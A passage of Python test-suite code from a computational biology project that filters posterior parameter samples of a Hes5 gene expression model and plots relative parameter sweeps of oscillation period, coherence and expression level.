x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hill_relative_sweep_' + parameter_name + '.pdf'))
def xest_make_relative_heterozygous_parameter_variation_low_variance(self):
number_of_parameter_points = 20
# number_of_parameter_points = 3
number_of_trajectories = 200
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.075, #standard deviation
model_results[:,1]>0.025)))) #standard deviation
# (alternative acceptance cuts were explored here)
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
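# conduct_all_parameter_sweeps_at_parameters appears to return a dictionary
# mapping parameter names to sweep result arrays; save one file per parameter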
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_relative_sweeps_low_variance_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_plot_hill_sweep_low_variance(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.075, #standard deviation
model_results[:,1]>0.025)))) #standard deviation
# (alternative acceptance cuts were explored here)
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# no secondary coherence filtering is applied here; precomputed sweep results are loaded below
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_sweeps_low_variance_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hill_relative_sweep_low_variance_' + parameter_name + '.pdf'))
def xest_make_heterozygous_relative_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# (alternative acceptance cuts were explored here)
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_heterozygous_relative_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_plot_heterozygous_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# (alternative acceptance cuts were explored here)
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = accepted_model_results[other_accepted_indices]
# sweep results are precomputed and loaded from the output folder below
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_heterozygous_relative_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_relative_sweep_' + parameter_name + '.pdf'))
def xest_investigate_heterozygous_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# (alternative acceptance cuts were explored here)
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = accepted_model_results[other_accepted_indices]
my_posterior_samples = my_posterior_samples[other_accepted_indices]
# sweep results are precomputed and loaded from the output folder below
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in ['mRNA_degradation_rate', 'repression_threshold']:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_heterozygous_relative_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
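# note: despite the 'rising' name, this keeps samples whose coherence at sweep
# point 15 (presumably above the reference parameter value) is below 0.1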
rising_coherence_indices, = np.where(my_parameter_sweep_results[:,15,4] < 0.1)
my_parameter_sweep_results = my_parameter_sweep_results[rising_coherence_indices]
these_samples = my_posterior_samples[rising_coherence_indices]
these_model_results = model_results[rising_coherence_indices]
np.set_printoptions(precision=3, suppress = True)
print(these_model_results)
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'investigating_heterozygous_relative_sweep_' +
parameter_name + '.pdf'))
pairplot = hes5.plot_posterior_distributions( these_samples )
pairplot.axes[3,0].set_xlim(0,2)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_rising_coherence_' +
parameter_name + '.pdf'))
pairplot2 = hes5.plot_posterior_distributions( my_posterior_samples )
pairplot2.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_coherence_0.2.pdf'))
def xest_plot_low_transcription_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output', 'sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# (alternative acceptance cuts were explored here)
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = accepted_model_results[other_accepted_indices]
# only the repression threshold sweep is plotted here; the other plotting methods use the full parameter list
parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.01)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.01)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
# this_axis.set_ylim(0,1)
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.01)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','relative_low_transcription_sweep_' + parameter_name + '.pdf'))
def xest_investigate_weird_parameter_behaviour(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
print('number of existing samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_basal_transcription_rate.npy'))
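# the sweep arrays are indexed as [sample, sweep point, statistic]; from the
# usage below, sweep point 9 appears to sit at the unchanged parameter value
# with points 4 and 14 below and above it, and statistics 3 and 4 hold the
# period and coherence. The selection keeps samples that oscillate with a
# short period at the lowered transcription rate but not at the reference.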
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,9,3] > 300),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.2)))
accepted_samples = my_posterior_samples[decrease_indices]
print('number of accepted samples is')
print(len(accepted_samples))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_weird_transcription_rate_behaviour.pdf'))
def xest_investigate_where_repression_threshold_changes_period(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
print('number of existing samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_repression_threshold.npy'))
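# a sample 'qualifies' if its coherence at the reference sweep point exceeds 0.1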
my_other_indices = np.where(my_parameter_sweep_results[:,9,4]>0.1)
print('number of qualifying samples is')
print(len(my_other_indices[0]))
my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,4,4]>my_parameter_sweep_results[:,9,4],
my_parameter_sweep_results[:,9,4]>0.1))
# my_indices = np.where( my_parameter_sweep_results[:,9,4]>0.2)
print('the average increase is')
print(np.mean(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the minimal increase is')
print(np.min(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the maximal increase is')
print(np.max(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the median increase is')
print(np.median(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
accepted_samples = my_posterior_samples[my_indices]
accepted_results = my_posterior_results[my_indices]
print('number of accepted samples is')
print(len(accepted_samples))
print('the minimal period is')
print(np.min(accepted_results[:,2]))
print(np.max(accepted_results[:,2]))
print(np.median(accepted_results[:,2]))
print('the coherence statistics are')
print(np.min(accepted_results[:,3]))
print(np.max(accepted_results[:,3]))
print(np.median(accepted_results[:,3]))
print('the mrna statistics are')
print(np.min(accepted_results[:,4]))
print(np.max(accepted_results[:,4]))
print(np.median(accepted_results[:,4]))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_repression_threshold_decreases_period.pdf'))
def xest_investigate_where_protein_degradation_changes_period(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
print('number of existing samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_protein_degradation_rate.npy'))
# my_other_indices = np.where(my_parameter_sweep_results[:,9,4]>0.1)
my_other_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4]>0.1, my_parameter_sweep_results[:,9,3]<300 ))
print('number of qualifying samples is')
print(len(my_other_indices[0]))
# my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,4,3]>my_parameter_sweep_results[:,9,3],
# my_parameter_sweep_results[:,9,4]>0.1))
my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,4,3]>my_parameter_sweep_results[:,9,3],
np.logical_and(my_parameter_sweep_results[:,9,4]>0.1, my_parameter_sweep_results[:,9,3]<300 )))
# my_indices = np.where( my_parameter_sweep_results[:,9,4]>0.2)
print('the average increase is')
print(np.mean(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the minimal increase is')
print(np.min(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the maximal increase is')
print(np.max(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the median increase is')
print(np.median(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
accepted_samples = my_posterior_samples[my_indices]
accepted_results = my_posterior_results[my_indices]
print('number of accepted samples is')
print(len(accepted_samples))
print('the minimal period is')
print(np.min(accepted_results[:,2]))
print(np.max(accepted_results[:,2]))
print(np.median(accepted_results[:,2]))
print('the coherence statistics are')
print(np.min(accepted_results[:,3]))
print(np.max(accepted_results[:,3]))
print(np.median(accepted_results[:,3]))
print('the mrna statistics are')
print(np.min(accepted_results[:,4]))
print(np.max(accepted_results[:,4]))
print(np.median(accepted_results[:,4]))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_protein_degradation_decreases_period.pdf'))
def xest_investigate_where_protein_degradation_decreases_coherence(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_protein_degradation_rate.npy'))
my_indices = np.where( my_parameter_sweep_results[:,9,3]<300)
my_parameter_sweep_results = my_parameter_sweep_results[my_indices]
my_posterior_samples = my_posterior_samples[my_indices]
print('total number of samples is:')
print(len(my_parameter_sweep_results))
# (several alternative selections were tried here)
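# the active condition keeps the complement: samples where the raised sweep
# point does not show both higher coherence and a shorter period than the reference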
my_indices = np.where(np.logical_not(np.logical_and(my_parameter_sweep_results[:,14,4]>my_parameter_sweep_results[:,9,4],
my_parameter_sweep_results[:,9,3]>my_parameter_sweep_results[:,14,3])))
accepted_samples = my_posterior_samples[my_indices]
accepted_results = my_posterior_results[my_indices]
print('number of accepted samples is')
print(len(accepted_samples))
print('likelihood is')
print(len(accepted_samples)/float(len(my_parameter_sweep_results)))
print('the minimal period is')
print(np.min(accepted_results[:,2]))
print(np.max(accepted_results[:,2]))
print(np.median(accepted_results[:,2]))
print('the coherence statistics are')
print(np.min(accepted_results[:,3]))
print(np.max(accepted_results[:,3]))
print(np.median(accepted_results[:,3]))
print('the mrna statistics are')
print(np.min(accepted_results[:,4]))
print(np.max(accepted_results[:,4]))
print(np.median(accepted_results[:,4]))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_protein_degradation_decreases_coherence.pdf'))
def xest_plot_model_prediction(self):
# no posterior filtering is applied in this plot; only the protein degradation sweep is shown
parameter_names = ['protein_degradation_rate']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' + parameter_name + '.npy'))
# more restrictive coherence-based selections were trialled before settling on the period cut below
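# keep samples whose period at the reference sweep point is below 300 minutes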
increase_indices = np.where(my_parameter_sweep_results[:,9,3] < 300)
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
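# axes-fraction coordinates for the panel labels added below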
x_coord = -0.4
y_coord = 1.1
my_figure = plt.figure( figsize = (4.5, 1.5) )
this_axis = my_figure.add_subplot(121)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(122)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','model_prediction_' + parameter_name + '.pdf'), dpi = 400)
def xest_plot_relative_parameter_variation_for_nancy(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# (alternative acceptance cuts were explored here)
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# no secondary coherence filtering is applied in this plot
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
# parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
